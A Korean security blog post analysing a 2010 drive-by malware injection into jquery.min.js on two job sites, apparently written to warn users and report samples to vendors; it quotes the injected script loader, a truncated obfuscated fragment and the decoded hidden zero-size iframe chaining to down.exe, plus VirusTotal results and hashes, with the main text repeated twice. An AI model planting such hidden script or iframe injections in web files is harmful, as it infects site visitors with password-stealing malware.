1차 유포 : [악성코드 유포] 알라딘 너희만 유포하냐?? 취업 , 포털 사이트인 우리도 질 수 없다.
2차 유포 : [악성코드 유포 !! 그들의 유포는 언제까지 계속 되는건가 ??
현재 오후 10시 40분 현재 잡 다음과 취업사이트 커리어에 다시한번 악성코드가 삽입되어 있는것을 발견하였다. 사이트를 수정한지 몇일 안되서 다시한번 이와 같은 사태에 너무나도 심각한게 느껴진다. 평일이지만 관리를 어떻게 하는건지 궁금할 따름이다 .
현재 잡 다음의 http://jobx.xxxx.net/xx/jquery.min.js 링크를 살펴 보면 아랫부분에 아이프레임으로 이와 같이 가려 놓았다
document.write("<script language=javascript src=http://생략/cp/w3.js></script>"); 남들이 볼 수 없게 맨 아래에 위치 해놓았으며 그걸 다시 해석 하면
<script language=javascript src=http://uc.wxxam.com/xx/w3.js></script>이와 같이 나와있다 !
사이트는 저번과 마찬가지로 커리어 JS 에서 다음쪽으로 연결되어서 함께 연결되어 동시 다발적으로 감염이 된거 같이 보인다 ! 현재 이 메인 페이지는 접속을 금하는게 좋을꺼 같다.
현재 이 사이트 메인 페이지에서 쉽게 감염이 될 수 있다. w3.js는 다시 asp를 받아주는 역활을 하게 되는데 역시 출력하는것도 예전과 같은 방법이다.
(function(중략){e=function(c){return c.toString(36)};중략 ('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5.6("<1 4=3://2.7.c/8/d.b a=0 9=0></1>");',14,14,'|중략)
다시 생략된 코드를 출력 하면
document.write("<iframe src=http://uc.wxxam.com/xx/w3.asp width=0 height=0></iframe>");
이와 같이 w3.asp로 안내하고 있음을 알 수 있다 !
이 w3.asp는 다시 최종 파일위치인 http://114.xxx.246.xxx/down.exe 이쪽으로 다시 연결 하고있다.
불과 사이트가 복구가 된지 몇일안되서 이런현상이 나타나다니 슬프다. 빨리 복구가 되었음 하는게 나의 바람이다.
[바이러스 토탈 결과]
현재 잡는 업체가 별로 없으므로 조심 해야 할거 같습니다.
날이 밝는데로 샘플은 안철수연구소 , 이스트 소프트 , 잉카인터넷 , 네이버로 신고합니다!
2차 유포 : [악성코드 유포 !! 그들의 유포는 언제까지 계속 되는건가 ??
현재 오후 10시 40분 현재 잡 다음과 취업사이트 커리어에 다시한번 악성코드가 삽입되어 있는것을 발견하였다. 사이트를 수정한지 몇일 안되서 다시한번 이와 같은 사태에 너무나도 심각한게 느껴진다. 평일이지만 관리를 어떻게 하는건지 궁금할 따름이다 .
현재 잡 다음의 http://jobx.xxxx.net/xx/jquery.min.js 링크를 살펴 보면 아랫부분에 아이프레임으로 이와 같이 가려 놓았다
document.write("<script language=javascript src=http://생략/cp/w3.js></script>"); 남들이 볼 수 없게 맨 아래에 위치 해놓았으며 그걸 다시 해석 하면
<script language=javascript src=http://uc.wxxam.com/xx/w3.js></script>이와 같이 나와있다 !
사이트는 저번과 마찬가지로 커리어 JS 에서 다음쪽으로 연결되어서 함께 연결되어 동시 다발적으로 감염이 된거 같이 보인다 ! 현재 이 메인 페이지는 접속을 금하는게 좋을꺼 같다.
현재 이 사이트 메인 페이지에서 쉽게 감염이 될 수 있다. w3.js는 다시 asp를 받아주는 역활을 하게 되는데 역시 출력하는것도 예전과 같은 방법이다.
(function(중략){e=function(c){return c.toString(36)};중략 ('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5.6("<1 4=3://2.7.c/8/d.b a=0 9=0></1>");',14,14,'|중략)
다시 생략된 코드를 출력 하면
document.write("<iframe src=http://uc.wxxam.com/xx/w3.asp width=0 height=0></iframe>");
이와 같이 w3.asp로 안내하고 있음을 알 수 있다 !
이 w3.asp는 다시 최종 파일위치인 http://114.xxx.246.xxx/down.exe 이쪽으로 다시 연결 하고있다.
불과 사이트가 복구가 된지 몇일안되서 이런현상이 나타나다니 슬프다. 빨리 복구가 되었음 하는게 나의 바람이다.
[바이러스 토탈 결과]
File name:
w3.jsResult:
1/ 37 (2.7%)| Antivirus | Version | Last update | Result |
|---|---|---|---|
| AhnLab-V3 | 2010.10.04.01 | 2010.10.04 | - |
| AntiVir | 7.10.12.116 | 2010.10.04 | - |
| Antiy-AVL | 2.0.3.7 | 2010.10.04 | - |
| Authentium | 5.2.0.5 | 2010.10.04 | - |
| Avast | 4.8.1351.0 | 2010.10.04 | - |
| Avast5 | 5.0.594.0 | 2010.10.04 | - |
| BitDefender | 7.2 | 2010.10.04 | - |
| CAT-QuickHeal | 11.00 | 2010.10.04 | - |
| ClamAV | 0.96.2.0-git | 2010.10.04 | - |
| Comodo | 6277 | 2010.10.04 | - |
| Emsisoft | 5.0.0.50 | 2010.10.04 | - |
| eTrust-Vet | 36.1.7891 | 2010.10.04 | - |
| F-Prot | 4.6.2.117 | 2010.10.04 | - |
| Fortinet | 4.1.143.0 | 2010.10.04 | - |
| GData | 21 | 2010.10.04 | - |
| Ikarus | T3.1.1.90.0 | 2010.10.04 | - |
| Jiangmin | 13.0.900 | 2010.10.03 | - |
| K7AntiVirus | 9.63.2662 | 2010.10.02 | - |
| Kaspersky | 7.0.0.125 | 2010.10.04 | - |
| McAfee | 5.400.0.1158 | 2010.10.04 | - |
| McAfee-GW-Edition | 2010.1C | 2010.10.04 | - |
| Microsoft | 1.6201 | 2010.10.04 | - |
| NOD32 | 5502 | 2010.10.04 | - |
| Norman | 6.06.07 | 2010.10.04 | - |
| nProtect | 2010-10-04.04 | 2010.10.04 | - |
| Panda | 10.0.2.7 | 2010.10.04 | - |
| PCTools | 7.0.3.5 | 2010.10.02 | - |
| Prevx | 3.0 | 2010.10.04 | - |
| Rising | 22.67.02.07 | 2010.09.30 | - |
| Sophos | 4.58.0 | 2010.10.04 | - |
| Sunbelt | 6978 | 2010.10.04 | - |
| TheHacker | 6.7.0.1.048 | 2010.10.04 | - |
| TrendMicro | 9.120.0.1004 | 2010.10.04 | - |
| TrendMicro-HouseCall | 9.120.0.1004 | 2010.10.04 | - |
| VBA32 | 3.12.14.1 | 2010.10.04 | - |
| ViRobot | 2010.10.4.4074 | 2010.10.04 | HTML.S.Iframe.420 |
| VirusBuster | 12.67.2.0 | 2010.10.04 | - |
| MD5: 13fc465a51a37f32664b178247075b42 |
| SHA1: 8f826d77054c245c6d80f4eacbd2db753e70c493 |
| SHA256: deac13debe7f668000fe9a2ab2ba31545c1732866d001f3c4e3f8d011e682c07 |
| File size: 420 bytes |
| Scan date: 2010-10-04 13:56:57 (UTC) |
File name:
w3.aspResult:
11/ 42 (26.2%)| Antivirus | Version | Last update | Result |
|---|---|---|---|
| AhnLab-V3 | 2010.10.04.01 | 2010.10.04 | - |
| AntiVir | 7.10.12.116 | 2010.10.04 | - |
| Antiy-AVL | 2.0.3.7 | 2010.10.04 | - |
| Authentium | 5.2.0.5 | 2010.10.04 | - |
| Avast | 4.8.1351.0 | 2010.10.04 | JS:Downloader-RN |
| Avast5 | 5.0.594.0 | 2010.10.04 | JS:Downloader-RN |
| BitDefender | 7.2 | 2010.10.04 | - |
| CAT-QuickHeal | 11.00 | 2010.10.04 | - |
| ClamAV | 0.96.2.0-git | 2010.10.04 | - |
| Comodo | 6277 | 2010.10.04 | - |
| DrWeb | 5.0.2.03300 | 2010.10.04 | - |
| Emsisoft | 5.0.0.50 | 2010.10.04 | - |
| eSafe | 7.0.17.0 | 2010.10.03 | - |
| eTrust-Vet | 36.1.7891 | 2010.10.04 | - |
| F-Prot | 4.6.2.117 | 2010.10.04 | JS/Crypted.GA.gen |
| F-Secure | 9.0.15370.0 | 2010.10.04 | - |
| Fortinet | 4.1.143.0 | 2010.10.04 | - |
| GData | 21 | 2010.10.04 | JS:Downloader-RN |
| Ikarus | T3.1.1.90.0 | 2010.10.04 | - |
| Jiangmin | 13.0.900 | 2010.10.03 | - |
| K7AntiVirus | 9.63.2662 | 2010.10.02 | Riskware |
| Kaspersky | 7.0.0.125 | 2010.10.04 | Exploit.JS.CVE-2010-0806.z |
| McAfee | 5.400.0.1158 | 2010.10.04 | - |
| McAfee-GW-Edition | 2010.1C | 2010.10.04 | Heuristic.BehavesLike.JS.BufferOverflow.A |
| Microsoft | 1.6201 | 2010.10.04 | - |
| NOD32 | 5502 | 2010.10.04 | - |
| Norman | 6.06.07 | 2010.10.04 | - |
| nProtect | 2010-10-04.04 | 2010.10.04 | Script-JS/W32.Agent.ABX |
| Panda | 10.0.2.7 | 2010.10.04 | - |
| PCTools | 7.0.3.5 | 2010.10.02 | - |
| Prevx | 3.0 | 2010.10.04 | - |
| Rising | 22.67.02.07 | 2010.09.30 | Trojan.DL.Script.JS.Agent.qx |
| Sophos | 4.58.0 | 2010.10.04 | Mal/JSBO-Gen |
| Sunbelt | 6978 | 2010.10.04 | - |
| SUPERAntiSpyware | 4.40.0.1006 | 2010.10.04 | - |
| Symantec | 20101.2.0.161 | 2010.10.04 | - |
| TheHacker | 6.7.0.1.048 | 2010.10.04 | - |
| TrendMicro | 9.120.0.1004 | 2010.10.04 | - |
| TrendMicro-HouseCall | 9.120.0.1004 | 2010.10.04 | - |
| VBA32 | 3.12.14.1 | 2010.10.04 | - |
| ViRobot | 2010.10.4.4074 | 2010.10.04 | JS.EX-CVE-2010-0806.5882.B |
| VirusBuster | 12.67.2.0 | 2010.10.04 | - |
| MD5: fae3e2f494020f9135fdfc94d370f696 |
| SHA1: a1562e206cc56e2081aee5f63ae4c03b6236cf0f |
| SHA256: edbae8d422bb214fe8ed32508014049c63313d99d0799d715db296ff250dbf50 |
| File size: 5975 bytes |
| Scan date: 2010-10-04 13:57:03 (UTC) |
File name:
down.exeResult:
22/ 43 (51.2%)| Antivirus | Version | Last update | Result |
|---|---|---|---|
| AhnLab-V3 | 2010.10.04.01 | 2010.10.04 | Trojan/Win32.OnlineGameHack |
| AntiVir | 7.10.12.116 | 2010.10.04 | TR/Crypt.ZPACK.Gen |
| Antiy-AVL | 2.0.3.7 | 2010.10.04 | - |
| Authentium | 5.2.0.5 | 2010.10.04 | - |
| Avast | 4.8.1351.0 | 2010.10.04 | - |
| Avast5 | 5.0.594.0 | 2010.10.04 | - |
| AVG | 9.0.0.851 | 2010.10.04 | PSW.Generic8.XJK |
| BitDefender | 7.2 | 2010.10.04 | Trojan.Peed.Gen |
| CAT-QuickHeal | 11.00 | 2010.10.04 | (Suspicious) - DNAScan |
| ClamAV | 0.96.2.0-git | 2010.10.04 | - |
| Comodo | 6277 | 2010.10.04 | - |
| DrWeb | 5.0.2.03300 | 2010.10.04 | Trojan.PWS.Siggen.8389 |
| Emsisoft | 5.0.0.50 | 2010.10.04 | Trojan.Win32.Pincav!IK |
| eSafe | 7.0.17.0 | 2010.10.03 | - |
| eTrust-Vet | 36.1.7891 | 2010.10.04 | - |
| F-Prot | 4.6.2.117 | 2010.10.04 | - |
| F-Secure | 9.0.15370.0 | 2010.10.04 | Trojan.Peed.Gen |
| Fortinet | 4.1.143.0 | 2010.10.04 | - |
| GData | 21 | 2010.10.04 | Trojan.Peed.Gen |
| Ikarus | T3.1.1.90.0 | 2010.10.04 | Trojan.Win32.Pincav |
| Jiangmin | 13.0.900 | 2010.10.03 | Trojan/Invader.add |
| K7AntiVirus | 9.63.2662 | 2010.10.02 | - |
| Kaspersky | 7.0.0.125 | 2010.10.04 | Trojan.Win32.Pincav.aijj |
| McAfee | 5.400.0.1158 | 2010.10.04 | Generic.dx!uda |
| McAfee-GW-Edition | 2010.1C | 2010.10.04 | - |
| Microsoft | 1.6201 | 2010.10.04 | PWS:Win32/Magania.BQ |
| NOD32 | 5502 | 2010.10.04 | a variant of Win32/PSW.Gamania.NBT |
| Norman | 6.06.07 | 2010.10.04 | - |
| nProtect | 2010-10-04.04 | 2010.10.04 | Trojan/W32.Pincav.54272.AC |
| Panda | 10.0.2.7 | 2010.10.04 | Suspicious file |
| PCTools | 7.0.3.5 | 2010.10.02 | - |
| Prevx | 3.0 | 2010.10.04 | High Risk Cloaked Malware |
| Rising | 22.67.02.07 | 2010.09.30 | - |
| Sophos | 4.58.0 | 2010.10.04 | Mal/Dorf-F |
| Sunbelt | 6978 | 2010.10.04 | - |
| SUPERAntiSpyware | 4.40.0.1006 | 2010.10.04 | - |
| Symantec | 20101.2.0.161 | 2010.10.04 | - |
| TheHacker | 6.7.0.1.048 | 2010.10.04 | - |
| TrendMicro | 9.120.0.1004 | 2010.10.04 | TROJ_PINCAV.SMXA |
| TrendMicro-HouseCall | 9.120.0.1004 | 2010.10.04 | TROJ_PINCAV.SMXA |
| VBA32 | 3.12.14.1 | 2010.10.04 | Malware-Cryptor.Inject.gen |
| ViRobot | 2010.10.4.4074 | 2010.10.04 | - |
| VirusBuster | 12.67.2.0 | 2010.10.04 | - |
| MD5: 8624b30f77f6bbdc8873cefd7d2748d1 |
| SHA1: d73556c5840327d3e0f04ed40991eaf8af2de4cd |
| SHA256: 8dbafaa681a7439fde881069217e4e365166c004be22c1dcd2764ca2b32f4644 |
| File size: 54272 bytes |
| Scan date: 2010-10-04 13:59:05 (UTC) |
현재 잡는 업체가 별로 없으므로 조심 해야 할거 같습니다.
날이 밝는데로 샘플은 안철수연구소 , 이스트 소프트 , 잉카인터넷 , 네이버로 신고합니다!
'security > 악성코드 유포' 카테고리의 다른 글
| Increase 를 이용한 악성 스크립트 ! (2) | 2010.10.17 |
|---|---|
| 한컴에서의 유포되었던 악성코드 ma.exe를 실행시킨 결과... (1) | 2010.10.11 |
| 악성코드 유포 !! 그들의 유포는 언제까지 계속 되는건가 ?? (2) | 2010.10.01 |
| [악성코드 유포] 알라딘 너희만 유포하냐?? 취업 , 포털 사이트인 우리도 질 수 없다. (1) | 2010.10.01 |
| yahoo.js 의 유포날짜 2차 정리 !! (0) | 2010.09.26 |
